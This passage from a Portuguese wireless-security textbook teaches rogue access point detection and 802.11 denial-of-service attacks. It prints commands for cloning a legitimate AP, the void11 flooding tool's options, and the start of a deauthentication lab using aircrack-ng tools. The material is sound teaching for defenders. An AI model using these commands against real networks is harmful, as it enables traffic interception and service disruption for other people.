11 Rogue malicioso: instalado com a intenção de criar uma “porta dos fundos” (backdoor)
em sua rede, de forma que o atacante tenha livre acesso a ela;

11 Rogues não intencionais: diferentemente dos amigáveis, são autorizados. A diferença está na
implantação, que ocorre sem considerar a política de segurança para dispositivos sem fio. É o
tipo mais comum, já que as organizações normalmente não monitoram suas redes sem fio.

Técnicas de identificação de rogues


A partir da rede cabeada: q
11 Fingerprinting do AP.

11 Análise do prefixo do MAC.

A partir da rede sem fio:

11 Warwalking.
Segurança em Redes sem Fio

11 Monitoração dos clientes.

11 Implantação de IDS na WLAN.

Uma vez conceituado o risco das redes rogues e descritos os tipos mais comuns, examina-
remos diferentes técnicas de identificação de rogues. A seguir, apresentamos as técnicas de
análise em duas frentes:

11 Análise a partir da rede cabeada;

11 Análise a partir da rede sem fio.

86
Rede cabeada: Fingerprinting do AP
11 Ferramentas de varredura de vulnerabilidades. q
11 Analisa o lado do AP que toca a LAN.

11 Depende de assinaturas.

11 Nessus.

22 Plugin #11026 (Access Point Detection).

A primeira técnica de análise a partir da rede cabeada é o uso de ferramentas de varredura


de vulnerabilidades para identificar APs que já tiveram seu perfil previamente traçado.

Quando falamos do perfil de um dispositivo de rede, nos referimos a características únicas


ou agrupadas que o identificam com um certo grau de precisão. Nessus, um popular sistema
de varredura de vulnerabilidades para Linux, conta com o plugin #11026 (find_ap.nasl -
Access Point Detection) para a identificação da presença de um WAP na rede, que se utiliza
de quatro técnicas:5

11 TCP/IP Fingerprinting NMAP: técnica baseada na determinação do Sistema Operacional


do sistema remoto, com base nas respostas a pacotes TCP/IP. Alguns Sistemas Operacio-
nais se comportam diferentemente do que é definido pelas Request for Comments (RFC,
documento do IETF) no que diz respeito a TCP/IP, comportamento anômalo que permite
identificar o sistema de maneira única. O que ferramentas como NMAP e Nessus fazem
é procurar, na base de assinaturas já conhecidas, por uma entrada que coincida com a
assinatura do dispositivo que está sendo avaliado. Para utilizar essa técnica, é necessário
que pelo menos uma porta seja alcançável pelo Nessus:

11 HTTP Fingerprinting: praticamente todo WAP conta com uma interface administrativa web.
Uma vez que o servidor web embarcado normalmente é proprietário, procura-se por cadeias
de texto no banner (tela inicial) que o identifiquem de maneira única: uma assinatura;

11 FTP Fingerprinting: da mesma maneira utilizada com os servidores web embarcados, é


possível identificar um determinado WAP pelo texto inicial que o servidor FTP – normal-
mente usado para atualização de firmware – apresenta;

w 11 Consultas SNMP: se a porta SNMP estiver aberta e a community string (que tem a

Leia “Wireless Access função de uma senha) for conhecida, esse plugin do Nessus tenta consultar o valor
Point Detection” em “sysDesc”.
http://www.tenable.com
Nessus, que antes era open source em todo o sentido da expressão, adotou em 2004 um
novo sistema de licenças, visando controlar o uso de sua ferramenta por empresas. Para ter
acesso aos plugins tão logo sejam lançados, é necessária a aquisição de uma licença.
Capítulo 5 - Redes rogue e ataques DoS

Rede cabeada: análise do prefixo MAC


Empresas alocam endereços MAC em blocos: q
11 Possibilidade de identificar produtos.

11 Possibilidade de procurar silenciosamente por rogues.

11 Escuta de tráfego ARP.

87
CPU WRT54G v4
WRT54GS v3
OpenWrt

br0

eth1

WIFI
vlan0 vlan1 eth Access Point

Tagging

eth0
Porta interna

WAN port Portas LAN

Internet 1 2 3 4 Case Labels

Números de portas VLAN


5 4 3 2 1 0

Tagging vlan1 vlan0 Figura 5.1


Arquitetura interna
do AP WRT54GS
Switch (v3), da Linksys.

Identificar a interface de rede pelos primeiros 24 bits do endereço MAC da interface –


Organizationally Unique Identifier (OUI), obtido com a IEEE – também é relevante para a
identificação de um AP na rede.

A arquitetura interna da maioria dos APs é composta de bridges e VLANs, como se pode w
observar pela arquitetura interna do AP WRT54GS (v3), da Linksys. Externamente, há a inter- Pesquise “IEEE OUI and
face de rede sem fio operando em modo Master, que confere ao AP sua função principal, Company_id Assign-
ments” no site http://
uma interface de rede para conexão com a rede de distribuição (a rede cabeada) e, por final, standards.ieee.org/
conexões para a ligação de estações por rede cabeada convencional. A interface que toca a
LAN permite que se faça esse tipo de análise.

Warwalking
11 Uso de ferramentas de wardriving. q
11 Etapas:

22 Determinar o que já existe em termos de redes sem fio.

22 Identificar APs autorizados.


Segurança em Redes sem Fio

22 Filtrar APs de redes autorizadas e vizinhas.

11 É importante fazer avaliações com frequência.

Kismet é uma ferramenta muito útil na detecção de rogues. Com Kismet, é possível conduzir
todas as etapas de um warwalking, com a possibilidade de filtrar redes não interessantes na
análise, ou seja, redes autorizadas e vizinhas (de outra organização próxima).

88
Para determinar as redes permitidas ou vizinhas: AP de uma empresa próxima, por exemplo
– é necessário saber os endereços (BSSID) dessas redes. Com esses dados em mãos, é pos-
sível configurar o servidor Kismet de forma que tais redes sejam omitidas da análise, isto é,
apenas redes rogue possíveis são exibidas.

O filtro pode ser configurado no arquivo kismet.conf, através da diretiva filter_tracker. Alguns
exemplos de filtro:

11 Filtro por BSSID: ignora BSSIDs especificados do processamento:

filter_tracker = BSSID(XX:XX:XX:XX:XX:XX,! XX:XX:XX:XX:XX:XX)

11 Filtro por origem: ignora determinados endereços MAC:

filter_tracker = SRC(! XX:XX:XX:XX:XX:XX,! XX:XX:XX:XX:XX:XX)

11 Filtro por máscara: ignora endereços (origem, destino ou BSSID) por prefixo:

filter_tracker = ANY(xx:xx:xx:00:00:00/FF:FF:FF:00:00:00)

É bom lembrar, entretanto, que um atacante pode forjar um AP por completo, ou seja, cons-
truir um AP com SSID, BSSID e outras configurações idênticas às da rede autêntica. Nesse
caso, o auditor deve identificar também a origem do sinal para se certificar de que apenas o
AP autêntico está divulgando a rede da empresa.

Monitoração da rede por clientes


11 Aproveita tempo ocioso da interface de rede. q
11 Indicada quando há a possibilidade de conexão por cabo.

11 Duas maneiras:

22 RFMON.

22 Enquanto associado.

11 Limitações:

22 RFMON.

33 Não é possível se associar a uma rede nesse modo.

22 Associado.

22 Não é possível identificar rogues que escondem SSID.

Usar os próprios clientes da rede para monitoração é uma boa alternativa para os hardwares
dedicados. Existem alternativas comerciais para essa tarefa – AirWave RAPIDS, por exemplo –,
mas nosso foco é em ferramentas gratuitas.
Capítulo 5 - Redes rogue e ataques DoS

O modo de operação RFMON é melhor suportado em Linux, existindo diversas ferramentas


à disposição, dependendo do tipo de informação que se quer monitorar. Sob Linux, é
possível implantar uma infraestrutura de sensores Kismet que reportam para um servidor
central através da rede cabeada – lembre-se de que não é possível se associar a uma rede
enquanto a interface estiver em modo RFMON. Estudaremos mais adiante essa alternativa
de monitoração usando drones Kismet.

Em Windows também há opções interessantes de monitoração. Uma delas é usar a interface de


gerenciamento que o Windows oferece, chamada de Windows Management Interface (WMI).

89
Através de utilitários como CScript (Windows scripting host), Scriptomatic, WMI Code Creator
e WMI Administrative Tools, é possível criar scripts VBS que consultam certos parâmetros do
Sistema Operacional. O “namespace” que nos interessa é o root\WMI, e as classes que nos
interessam possuem o padrão MSNdis_80211_.

É bom lembrar que nem todas as interfaces de rede possuem drivers que permitem
que todas as classes MSNdis_80211_* sejam usadas.

Rede sem fio: IDS na WLAN


11 Intrusion Detection System. q
11 Monitoração constante.

22 Clientes ociosos.

22 Dispositivos dedicados.

11 Lista de redes autorizadas e vizinhas.

11 Implantação deve abranger toda a infraestrutura da organização.

11 IDS Distribuído.

22 Solução open source:

33 Drones Kismet com servidor central.

Implantar uma rede sem fio segura significa utilizar mecanismos de segurança, possuir uma
política, monitorar a rede e auditá-la contra a política vigente. Monitoração é um elemento
muito importante, mas muitas empresas simplesmente o ignoram.

Kismet é uma ferramenta open source (código aberto) que não deve nada a ferramentas Open source
comerciais. É mais conhecido como ferramenta de auditoria e mapeamento de redes sem Também conhecido por
fio, mas sua funcionalidade de IDS de camada MAC é boa o suficiente para que se implante software livre, respeita
as quatro liberdades
monitoração da rede. definidas pela Free
Software Foundation,
Kismet é composto de três componentes: compartilhadas também
pelo projeto Debian.
11 Kismet Client: interface gráfica de visualização dos dados coletados pelo Kismet Server.
Assim como em ferramentas como Nessus, normalmente conecta-se com um servidor no
próprio host. Sua configuração se resume basicamente a selecionar as informações que
serão exibidas e o endereço do servidor Kismet;

11 Kismet Server: servidor de coleta. É nesse componente da arquitetura Kismet que se l


configura as fontes de dados (local ou drone), padrões de troca de canais, quais canais Conheceremos na
monitorar, entre outros parâmetros; atividade prática mais
detalhes sobre essa
11 Kismet Drones: arquitetura opcional do Kismet, em que um drone captura dados da funcionalidade do
rede sem fio e encaminha para o servidor Kismet através de uma conexão secundária Kismet, mais especifica-
Segurança em Redes sem Fio

mente sobre a
(normalmente, a rede sem fio). Exige pouco hardware e permite que se instalem drones
implantação de drones
diferentes para canais diferentes – a situação ideal é um drone em cada canal em tempo Kismet.
integral – e até padrões diferentes, como IEEE 802.11a, por exemplo.

90
Intrusion Prevention System (IPS)
11 Rogues identificados pelo Kismet. q
11 Cliente tenta se conectar ao AP rogue.

11 IPS DoS contra os clientes da rede rogue.

Riscos:

11 Falso-positivos.

11 Desconectar clientes de redes vizinhas.

É possível atacar o problema dos rogues de uma maneira mais ativa com a implantação
de um Intrusion Prevention System (IPS). Difere de um IDS porque, em vez de se limitar a
registrar intrusões, reage a elas. Uma sugestão de reação é efetuar um ataque de Denial of
Service (DoS) contra os clientes que associam ao AP rogue.

Quando o IPS da rede sem fio detecta a tentativa de um cliente se associar a um AP rogue, ele
transmitirá quadros de desautenticação 802.11 forjados para a estação. Dessa forma, a estação
considera os quadros provenientes do AP rogue e a conexão é terminada imediatamente.

Pacotes de desautenticação são pacotes 802.11 de gerenciamento (tipo 00) e subtipo 1100.
São anúncios que indicam que o receptor não está mais autenticado. É uma comunicação de
uma via que, normalmente, parte de um Access Point (BSS) e deve ser aceito pela estação,
com efeito imediato. A condição de negação de serviço se atinge quando se transmite cons-
tantemente esse tipo de quadro 802.11 a cada tentativa de autenticação da estação.

Existem soluções comerciais de IPS disponíveis, mas é possível implantar um IPS básico
associando a saída do Kismet com mdk3 – respectivamente, ferramentas de monitoração/
IDS e ataque DoS por desautenticação.

Teremos a oportunidade de experimentar tanto com IDS distribuído usando Kismet quanto
com ataques DoS.

Localizando rogues por análise de SNR


Signal to Noise Ratio (SNR): q
11 Sem unidade, potência em dBm.

11 Análise manual.

11 Localiza a propagação do sinal e não o dispositivo.

11 Melhor SNR obtido enquanto associado.


Capítulo 5 - Redes rogue e ataques DoS

91
Força (dBm)

RSSI
(Intensidade do sinal)

Relação
sinal-ruído

Nível de ruído

119129
Figura 5.2
Relação Sinal x
Tempo (segundos) Ruído.

Signal to Noise Ratio (SNR) ou Relação Sinal x Ruído, algumas vezes referenciado como S/N, é
um valor usado para a razão entre a potência de um sinal e o ruído de fundo. Quanto maior
o valor de SNR, menor é o número de erros e mais próximo se está do transmissor. É possível
estimar a localização de rogues com base nesse indicador e no endereço MAC do dispositivo.

O melhor SNR é obtido quando se está associado à rede, mas isso nem sempre é possível
para um auditor. Por isso, é necessário o uso de interfaces de rede em modo Monitor asso-
ciado a ferramentas como Kismet para a leitura das medições de SNR.

É importante lembrar que o valor de SNR tem mais relação com o padrão de propagação
do sinal do que com o dispositivo transmissor em si. Isso quer dizer que é possível captar, a
metros do AP rogue, um valor mais alto do que em cima dele.

Etapas da localização por SNR


11 Diagrama do prédio. q
11 Amostragem de diversos pontos.

11 Processamento posterior para estimar a posição do transmissor.

11 Primeira fase da análise manual: consiste em obter diagramas do prédio que está
sendo auditado. Isso é importante para que o auditor possa identificar, no diagrama, o
sinal e o ruído em cada ponto;

11 Segunda fase: consiste em efetivamente coletar os valores de SNR em diversos pontos


do local. É recomendado que se utilize uma antena omnidirecional (dipolo) para que o
ganho e a abertura de captura da antena (beamwidth) não comprometam a medição,
que deve ser pontual. É recomendado também que o auditor realize um movimento de
Segurança em Redes sem Fio

rotação lento sobre o ponto, coletando por pelo menos 30 segundos;

11 Terceira fase: é a de análise. Nela, o auditor analisa os valores de SNR e os confronta


com o mapa, identificando os pontos com maior qualidade de sinal. Uma vez determi-
nada uma provável região em que o AP possa estar, o auditor pode passar a utilizar uma
antena direcional.

92
Criando um AP rogue sob Linux
11 Objetivo: se passar por um AP existente. q
11 Interface em modo Master: implementação mais simples:

# ifconfig wlan0 hwether XX:XX:XX:XX:XX:XX

# ifconfig 192.168.1.1 netmask 255.255.255.255

# iwconfig wlan0 mode master

# iwconfig wlan0 essid ROGUE

# iwconfig wlan0 key off

# iwconfig wlan0 rate auto

11 Airbase-ng: uma ferramenta do pacote aircrack-ng que permite criar um rogue AP


com várias opções:

# airbase-ng --essid ROGUE –a XX:XX:XX:XX:XX:XX mon0

11 Servidor DNSmasq opcional: encaminhador de requisições DNS e DHCP para


pequenas redes com NAT.

11 Servidor web ou Captive portal.

É muito simples criar um Soft AP, um AP baseado em software. No exemplo do slide


podemos ver, de maneira simplificada, o que é essencial para simplesmente se passar por
um AP existente.

Primeiro troca-se o endereço MAC, IP e máscara de rede da interface sem fio, de forma que

l sejam os mesmos do AP que se deseja duplicar. Depois, ativamos o modo Master e definimos
um SSID igual ao do AP original, o que já é suficiente para que estações próximas vejam a
Para solução completa
de Soft AP, normal- interface como rede sem fio. Em seguida, configura-se parâmetros típicos de hotspots, como
mente se emprega um a ausência de mecanismos de segurança (WEP e WPA, para falar dos mais básicos) e, final-
software chamado
mente, a taxa de transmissão.
DNSmasq, um servidor
que integra as funções
Os passos anteriores já são suficientes para que as estações se conectem ao seu AP clone,
de encaminhador de
requisições DNS e embora ainda não sejam possíveis consultas DNS ou roteamento para a internet. Uma vez
servidor DHCP, ideal que a intenção é apenas de capturar tráfego dos clientes, bastaria um servidor DHCP devi-
para pequenas redes
damente configurado para configurar automaticamente nas estações endereços IP, servi-
que tenham NAT
implementado. dores DNS e gateway.

Exercício de fixação 1 e
Redes rogue
Capítulo 5 - Redes rogue e ataques DoS

Explique as técnicas de análise de redes rogue.

93
Denial of Service (DoS)
11 Negação de Serviço. q
11 Ameaça frequentemente ignorada.

11 Não requer equipamento especial ou atacante avançado.

22 Notebooks comuns.

22 Interfaces de rede comuns.

22 Softwares disponíveis na internet.

11 A especificação 802.11i não oferece proteção.

Ataques DoS normalmente são desprezados por quem projeta uma rede sem fio, especial-
mente pela concepção errada de que são ataques complexos, que exigem equipamentos
caros e um atacante altamente capacitado.

É possível iniciar um ataque DoS com equipamentos comuns encontrados em lojas e sof-
twares simples, baseados em Windows e Linux. Para transmitir, um atacante não precisa
nem mesmo estar próximo à rede-alvo: o uso de antenas de alto ganho permite que se
ataque a rede a grandes distâncias.

A seguir, veremos alguns ataques que podem ser feitos contra organizações que tenham
redes sem fio implantadas.

Tipos de ataque DoS contra redes 802.11


Persistentes: q
11 Causam impacto, mesmo depois que o ataque cessa.

11 Mais eficiente para o atacante, exige menos recursos.

11 Pode exigir reboot.

Não persistentes:

11 Perdem sua eficácia quando o ataque cessa ou o atacante fica fora de alcance.

11 Mais comum.

Ataques DoS podem ser divididos em dois tipos:

11 Persistentes: causam impacto no sistema atacado, mesmo depois que o ataque termina;

11 Não persistentes: o impacto na rede cessa após o ataque.

Ataques persistentes e não persistentes podem ser empregados, dependendo do obje-


tivo do atacante. Para interromper a atividade de rede por pouco tempo – para evitar ser
detectado, por exemplo –, um ataque não persistente é suficiente para esSe propósito. Já
o ataque persistente pode abranger todos os Access Points e canais – o que é mais interes-
sante, se a intenção é interromper a atividade de rede por completo e por mais tempo.
Segurança em Redes sem Fio

Ataque contra a camada física


Ataques na camada 1. q
11 Ruído nas frequências de Wi-Fi.

11 Maior potência, mais canais.

11 Um ou mais canais.

Exploração de vulnerabilidades nas especificações da camada MAC 802.11.

94
Ataques contra a camada física visam explorar vulnerabilidades, tanto do meio quanto de
especificações de protocolo.

O meio de radiofrequência utilizado por redes sem fio inclui as faixas de 2.4 GHZ ou 5 GHZ.
Esse é o alvo do atacante que deseja atacar o meio. Redes sem fio, como redes cabeadas,
dependem de um meio compartilhado que, mesmo sem atacantes, já é sujeito a DoS – um
usuário que use demais o meio ou outras redes com a mesma frequência.

Os ataques mais comuns não envolvem inserção de ruído na rede através de equipamentos
específicos, opção muitas vezes cara. É mais comum explorar vulnerabilidades nas próprias
especificações da camada MAC de IEEE 802.11 e nos clientes. Vamos nos limitar a explorar esses
últimos ataques, que usam equipamentos-padrão de rede sem fio e exigem softwares simples.

Ataques à camada MAC 802.11


Especificação 802.11. q
11 Diversas vulnerabilidades DoS.

11 Se fossem corrigidas, o padrão seria quebrado.

Não há autenticação por pacote para os quadros.

11 Falha crítica.

11 Possibilidade de transmitir quadros de qualquer MAC de origem.

11 Pacotes de gerenciamento são transmitidos em claro.

Como se defender de DoS se a própria especificação de 802.11 permite ataques?

Dentre as vulnerabilidades, a que se destaca é a completa falta de um mecanismo de


autenticação por pacote. Sem esse mecanismo, um atacante pode forjar o endereço MAC
de origem dos pacotes, enviando qualquer tipo de quadro na rede sem fio. A estação que
recebe esses quadros forjados não tem como detectar que eles não foram enviados pelo
endereço MAC do pacote. Resultado: os pacotes são processados como se fossem autên-
ticos. O que impede a extinção desse tipo de vulnerabilidade é que alterar o comportamento
do protocolo o quebraria, causando no mínimo incompatibilidade entre equipamentos.

Quadros de gerenciamento são especialmente interessantes para se efetuar um ataque DoS


contra estações de uma rede sem fio. A seguir, veremos alguns ataques que exploram tipos
específicos de quadros de gerenciamento.

Ataque persistente: flood de autenticação ou associação


Autenticação ou associação repetida de origens forjadas. q
11 São possíveis 2007 AID (Association Identifier) por AP 802.11.
Capítulo 5 - Redes rogue e ataques DoS

11 Esgotamento de recursos do AP.

Reações diversas, dependendo do AP.

11 Sempre com alguma forma de DoS.

Uma das principais ferramentas.

11 Aireplay-ng (pacote Aircrack-NG).

Introduzimos a questão de ataques DoS contra a camada MAC por autenticação ou asso-
ciação. O ataque ocorre pelo esgotamento de recursos do Access Point: o atacante envia
quadros de gerenciamento dos subtipos autenticação e associação com origem forjada, na
tentativa de esgotar a memória e o processamento do Access Point. Lembre-se de que uma

95
interface pode se associar a apenas um BSS, o que nesse caso não acontece – a interface de
rede do atacante não conclui nenhuma associação porque o endereço de origem foi forjado.

A especificação IEEE 802.11 determina que o número máximo de Association Identifiers (AID)
que podem ser alocados é de 2007, por razões de economia de energia, mas não determina
o que deve ser feito quando esse limite é atingido. Os Access Points têm diversas reações a
esse ataque, todas com alguma forma de DoS:

11 Reboot;

11 Desassociação de clientes previamente associados;

11 Rejeição de novas associações, enquanto as ativas não terminam ou atingem timeout;

11 “Congelamento” do AP.

O único limitador desse ataque é que, em redes com autenticação por chave compartilhada
(WEP), o atacante deve primeiro se autenticar – o que implica obter a chave WEP de alguma
forma. Veremos adiante como comprometer chaves WEP.

[root@localhost console]# voidll_penetration

/* voidll – 802.11b penetration testing utility

* version 0.2.0 send comments to HYPERLINK


“mailto:reyk@vantronix.net” reyk@vantronix.net

* general options:

* -t val type (default: 1)

* 0: no action

* 1: deauth stations

* 2: auth flood

* 3: assoc flood

* -d n delay (default: 10000 usecs)

* -s MAC station (default: ff:ff:ff:ff:ff:ff / Randon)

* -S str ssid (default: ‘ ‘)

* -h show this help

* -D debug (-DD... for more bssids)

*
Segurança em Redes sem Fio

* single target dos:

* -B MAC dssid (default: scan for bssids)

* auto target dos:

* -m n max concurrent floods (default: 23 floods)

96
* -T n timeout (default: 10sec)

* -l file matchlist

* -p n match policy (white: 0, black:1 default: 0)

*/

Figura 5.3
Interface gráfica do
gVoid11.

Void11 é uma implementação do ataque de associação ou autenticação para Linux que usa o
driver HostAP. Usa endereços MAC aleatórios para atacar APs especificados na execução do
programa ou qualquer um que seja detectado.

A ferramenta implementa outros tipos de ataque – desautenticação, por exemplo, que


veremos a seguir. Em uma versão mais recente, inclui uma interface gráfica, o que facilita o
Script kiddie trabalho dos script kiddies.
Termo depreciativo
atribuído aos grupos
Ataque não persistente: flood de desautenticação
q
de crackers inexpe-
rientes (geralmente
11 Atacante forja o MAC do AP.
muito jovens) que
desenvolvem atividades 11 Quadros de desautenticação enviados para os clientes.
relacionadas com
segurança da infor- 11 Pode ter como alvo um usuário ou todos.
mação utilizando-se do
11 Drivers mais novos não reagem a quadros 802.11.
Capítulo 5 - Redes rogue e ataques DoS

trabalho intelectual dos


verdadeiros especia- O ataque de desassociação ou desautenticação interrompe a comunicação com o AP, tirando
listas técnicos.
proveito dos quadros criados para liberar carga do AP quando há muitos clientes associados.

A reação do driver do cliente pode ser a de buscar o mesmo SSID em outros canais, tentar
uma nova conexão com o AP ou ignorar por completo os quadros.

Diferente de ataques de camada física, que atacam toda a atividade de redes sem fio em
determinados canais, esse tipo de ataque é mais específico. Pode ser direcionado a um
cliente específico ou mesmo a todos os clientes de um AP, ao enviar o quadro para o ende-
reço de broadcast (FF:FF:FF:FF:FF:FF).

97
Ataque não persistente: autenticação inválida
11 Atacante envia requisição de autenticação inválida para AP com MAC de origem q
(vítima) forjado.

11 AP responde para o IP de origem (vítima) com “unknown or unsupported algorithm”.

11 Usuário previamente autenticado é desautenticado.

11 Não persistente.

11 Clientes normalmente reautenticam.

w
Nesse ataque DoS divulgado na lista BUGTRAQ, um pacote forjado de autenticação é
enviado com um algoritmo inválido, que aparenta ter partido do cliente que se pretende
atacar. Uma vez que o Access Point já estava autenticado, os APs normalmente respondem Mais informações em
com um quadro de gerenciamento “unknown or unsupported algorithm” e interrompem a “BugTraq: 802.11b DoS
exploit”: http://www.
conexão em andamento. securityfocus.com e em
Mark “Fat Bloke”
De acordo com seu autor, um pacote a cada 2.5 segundos é o suficiente para se ter sucesso e Osborne: http://www.
manter um ataque DoS constante. loud-fat-bloke.co.uk/

Ataque não persistente: reserva do meio


Atacante forja múltiplos pacotes RTS: q
11 Request to Send.

11 Quadro de controle tipo 01 e subtipo 1011.

NAV definido como máximo: 32.767 microssegundos.

11 Network Allocation Vector.

11 1 segundo ~ 31 pacotes.

Os nós perdem acesso à rede pelo período determinado no NAV.

Outro problema de reserva de meio é o nó oculto.

O mecanismo de gerenciamento do meio Request to Send/Clear To Send (RTS/CTS) usa


quadros de controle para “limpar” o meio antes de transmitir. Apenas um cliente da rede
pode transmitir por vez, para que não crie colisões – o que caracteriza a natureza half-duplex
do algoritmo Carrier-Sense Multiple Access with Collision Avoidance (CSMA/CA).

É possível atacar esse mecanismo forjando pacotes RTS com o Network Allocation Vector
(NAV) definido com seu valor máximo – 32.767 microssegundos. Assim, o envio de pelo
menos 31 desses pacotes por segundo é o suficiente para impedir que outros nós tenham
acesso à rede por 1 segundo. Aplicado de maneira constante, coloca a rede em condição de
negação de serviço (DoS).

O cliente da rede “escuta” o meio antes de transmitir. Uma vez transmitido, o cliente recebe
um quadro de reconhecimento (ACK, tipo 01 e subtipo 1101) apenas para quadros de dados
Segurança em Redes sem Fio

enviados – quadros de gerenciamento não recebem ACK. Essa característica faz com que as
redes sofram do problema do nó oculto, representado na próxima ilustração.

98
Ataque não persistente: problemas de CSMA/CA

Nó A Nó B Nó C

Figura 5.4
Problema do
nó oculto.

Considere um caso em que o nó A está transmitindo para o nó B. O nó C não está ciente


disso e também tenta transmitir para B, produzindo colisão. Uma rede com vários desses
nós ocultos pode sofrer de baixas taxas de transmissão e desempenho. O gerenciamento de
meio RTS/CTS resolve esse problema.

Veja como o problema do “nó oculto” é resolvido pelo mecanismo RTS/CTS:

11 A estação A transmite um quadro RTS informando um Network Allocation Vector (NAV),


que é o tempo reservado para a sua transmissão;

11 A estação B recebe o quadro RTS e responde para toda a área de abrangência de B com
um quadro Clear To Send (CTS). A estação que não enviou um quadro RTS interpreta isso
como um sinal para aguardar antes de transmitir. A estação que transmitiu o quadro RTS
– estação A, nesse caso – interpreta como sinal verde para a transmissão do quadro;

11 Estação A transmite o quadro.

DoS e IEEE 802.11


11 IEEE está ciente das falhas e ataques. q
11 802.11i é tão vulnerável a DoS quanto 802.11 de 1997.

11 Solução: 802.11w.

22 Proteção para quadros de gerenciamento.


Capítulo 5 - Redes rogue e ataques DoS

11 Meio sempre será vulnerável.

A proteção dos quadros de gerenciamento está sendo tratada pelo grupo de trabalho
TGw (Project IEEE 802.11 Task Group w – Protected Management Frames).

O IEEE está ciente das falhas de 802.11 e dos ataques aos quadros de gerenciamento, mas
esse grupo de trabalho não tem como objetivo acabar com a ameaça do DoS. O resultado
desse grupo de trabalho será um padrão 802.11w capaz de eliminar diversas vulnerabilidades
do protocolo de gerenciamento de 802.11. Vale lembrar que o meio sempre será vulnerável a
interferências de outras redes, fornos de micro-ondas, telefones sem fio e/ou mesmo
RF-jamming, que consiste em poluir propositalmente a faixa de frequência das ondas de rádio.

99
Medidas de defesa
11 Pouco pode ser feito. q
11 Barreiras contra a propagação de sinais de radiofrequência.

11 Identificar ataques em andamento com IDS.

11 Plano de resposta.

Pouco pode ser feito para a contenção de ataques de DoS. A única maneira de impedir os
ataques que abordamos é difícil de ser implantada: limitar a capacidade do atacante de
transmitir para os dispositivos da sua rede sem fio. Um sistema de IDS pode ser útil para
identificar ataques em andamento, o que pode eliminar outras possibilidades de indisponi-
bilidade na rede sem fio.

Identificar ataques também pode auxiliar na resposta a ataques, fazendo com que os
administradores da rede tomem medidas cabíveis, como por exemplo procurar o dispositivo
usando técnicas de identificação de rogues.

A melhor medida de defesa contra ataques DoS é ter um plano de resposta a esse tipo de
ameaça, determinando o que a organização deverá fazer para minimizar o impacto em
elementos críticos da rede.
Segurança em Redes sem Fio

100
Roteiro de Atividades 5
Atividade 5.1 – Identificando APs na rede cabeada
Nesta atividade, executaremos o Nmap, com um script Nmap Script Engine (NSE) específico
para identificar Access Points que estão ligados na rede cabeada do laboratório. Esse script foi
desenvolvido por Joshua Wright (instrutor do SANS Institute) e está disponível no diretório
/root/Desktop/SEG6/rogueap.nse e no site http://www.willhackforsushi.com/code/rogueap.nse

Copie o arquivo rogueap.nse para o diretório de scripts NSE do Nmap (/usr/local/share/nmap/scripts).


Para realizar esse laboratório, será necessário que o AP esteja conectado à rede cabeada
do laboratório.

# nmap -sS -O --open --script=rogueap.nse <Faixa de endereços IP>

Exemplo:

# nmap -sS -O --open --script=rogueap.nse 192.168.1.1-10

Starting Nmap 5.51 ( http://nmap.org ) at 2011-11-02 17:22 EDT

Nmap scan report for 192.168.1.1

Host is up (0.0031s latency).

Not shown: 996 filtered ports, 3 closed ports

PORT STATE SERVICE

80/tcp open http

|_rogueap: Possible Rogue AP Found: “Linksys WRT54G or WRT54G2, or


Netgear WGR614 or WPN824v2 wireless broadband router”

MAC Address: 00:18:39:C8:B5:48 (Cisco-Linksys)

Device type: WAP|broadband router

Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X

OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or


WPN824v2 wireless broadband router, Netgear WGT624 WAP, Netgear
WGR614v7, WGT624v3, or WPN824v2 WAP (VxWorks 5.4.2)

Network Distance: 1 hop


Capítulo 5 - Roteiro de Atividades

OS detection performed. Please report any incorrect results at


http://nmap.org/submit/ .

Nmap done: 10 IP addresses (1 host up) scanned in 22.31 seconds

No exemplo anterior fizemos uma varredura na faixa de endereços IP iniciando por


192.168.1.1 até 192.168.1.10. Nessa varredura encontramos um Access Point com o IP
192.168.1.1, que provavelmente é um Linksys WRT54G ou WRT54G2 ou Netgear WGR614 ou
WPN824v2 wireless broadband router.

101
É importante observar que essa abordagem é útil somente na análise a partir da rede
cabeada. A ideia é saber se existe um AP oculto na rede, logo não faz sentido usar essa
varredura a partir de um cliente associado ao AP.

Além do Nessus e do Nmap, é possível realizar essa varredura através do software Paglo
RogueScanner, disponível tanto para Windows como para Linux

Atividade 5.2 – Realizando um ataque de Negação de Serviço em 802.11


Nesta atividade executaremos um dos tipos de ataque de negação de serviço que explora a
desassociação de clientes 802.11 pelo envio de quadros de gerenciamento com conteúdo e
origem forjados.

Lembre-se de usar esse tipo de comando com responsabilidade e ética.

Nesse tipo de ataque, a condição de Negação de Serviço (Denial of Service – DoS) é criada
quando um cliente é impedido de se manter associado a um AP. Também é possível realizar
um ataque ainda mais abrangente, que afeta qualquer cliente de um dado AP.

Esse tipo de ataque explora vulnerabilidades dos próprios protocolos 802.11, que não foram
desenvolvidos sem prever o envio de quadros forjados, que simulam ordens do AP para
clientes que chegam na forma de quadros 802.11 do tipo “deauthentication” e “disassociation”.

Há um grupo de trabalho IEEE trabalhando na proteção de quadros de gerenciamento,


802.11w (Protected Management Frames). O ataque que iremos realizar não será mais possível
depois que esse novo padrão for ratificado e se tornar disseminado entre os equipamentos.
Alguns outros ataques de DoS, além do próprio jamming físico, ainda serão possíveis.

Antes de qualquer comando, você deve verificar se sua interface de rede 802.11 e respectivo
driver permitem a injeção de pacotes, essencial na criação de quadros que se passam por
tráfego proveniente do AP. Para verificar isso, use os comandos airmon-ng, airodump-ng e
aireplay-ng, parte do pacote de ferramentas Aircrack-ng.

# airmon-ng start wlan0

Interface Chipset Driver

wlan0 Ralink 2573 US rt73usb - [phy0]

(monitor mode enabled on mon0)

# aireplay-ng mon0 --test

Tanto a interface de rede que estamos usando quando o módulo (driver) rt73 foram tes-
Segurança em Redes sem Fio

tados previamente. Uma saída bem-sucedida do comando é:

12:11:37 Trying broadcast probe requests...

12:11:38 Injection is working!

12:11:38 Found 1 AP

12:11:38 Trying directed probe requests...

102
12:11:38 00:02:6F:xx:xx:xx - channel: 1 - ‘rnpesr’

12:11:43 Ping (min/avg/max): 8.811ms/46.750ms/199.119ms Power: 37.25

12:11:43 12/30: 40%

Se o comando anterior foi bem-sucedido, então podemos prosseguir. Algumas vezes é


necessário descarregar o módulo rt73 e carregá-lo novamente.

Agora busque redes e clientes próximos usando a ferramenta Airodump-ng. Também


podemos utilizar Kismet.

# airodump-ng mon0

Uma saída comum do comando é:

CH 2 ][ Elapsed: 4 s ][ 2008-10-03 12:21

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

